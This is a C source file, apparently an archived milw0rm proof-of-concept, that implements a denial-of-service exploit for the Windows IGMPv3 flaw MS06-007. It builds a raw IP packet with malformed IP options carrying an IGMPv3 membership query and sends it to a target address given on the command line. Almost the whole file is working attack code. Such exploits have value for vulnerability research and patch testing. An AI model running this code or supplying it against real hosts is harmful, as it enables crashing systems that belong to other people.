/* IGMP v3 DoS Exploit ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx by Alexey Sintsov (dookie@inbox.ru) Req: Administrator rights on system Windows Firewall off (for sending RAW packets) Affected Products: Microsoft Corporation Windows XP All Microsoft Corporation Windows Server 2003 All */ #include #include #pragma comment(lib, "Ws2_32.lib") typedef struct iphdr { unsigned char verlen; // IP version & length unsigned char tos; // Type of service unsigned short total_len; // Total length of the packet unsigned short ident; // Unique identifier unsigned short frag_and_flags; // Flags unsigned char ttl; // Time to live unsigned char proto; // Protocol (TCP, UDP etc) unsigned short checksum; // IP checksum unsigned int sourceIP; // Source IP unsigned int destIP; // Destination IP unsigned short options[2]; } IPHEADER; typedef struct igmphdr { unsigned char type; unsigned char code; unsigned short checksum; unsigned long group; unsigned char ResvSQVR; unsigned char QQIC; unsigned short num; unsigned long addes; } IGMPHEADER; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int sendIGMP(char* a, char* b) { unsigned int dst_addr, src_addr; IPHEADER ipHeader; IGMPHEADER igmpHeader; dst_addr=inet_addr (b); src_addr=inet_addr (a); char szSendBuf[60]={0}; int rect; WSADATA WSAData; if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = WSASocket(AF_INET,SOCK_RAW, IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) { printf("Create socket error"); WSACleanup(); return FALSE; } BOOL flag=TRUE; if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { printf("Set options error"); closesocket(sock); WSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=htons(99); ssin.sin_addr.s_addr=dst_addr; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader)); ipHeader.ident=htons(0); ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_IGMP; ipHeader.checksum=0; ipHeader.tos=0; ipHeader.destIP=dst_addr; ipHeader.sourceIP=src_addr; //Ip options ipHeader.options[0]=htons(0x0000); //bug is here =) ipHeader.options[1]=htons(0x0000); igmpHeader.type=0x11; //v3 Membership Query igmpHeader.code=5; igmpHeader.num=htons(1); igmpHeader.ResvSQVR=0x0; igmpHeader.QQIC=0; igmpHeader.group=inet_addr("0.0.0.0"); igmpHeader.addes=dst_addr; igmpHeader.checksum=0; memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader)); igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4); ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader))); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { printf("Send error: <%d>\n",WSAGetLastError()); closesocket(sock); WSACleanup(); return 0; } closesocket(sock); WSACleanup(); return 1; } main(int argc, char **argv) { if(argc<2) { printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n"); printf("Usage:\n"); printf("c:\\igmps.exe \n\n"); exit(0); } sendIGMP(argv[2], argv[1]); return 0; } // milw0rm.com [2006-03-21]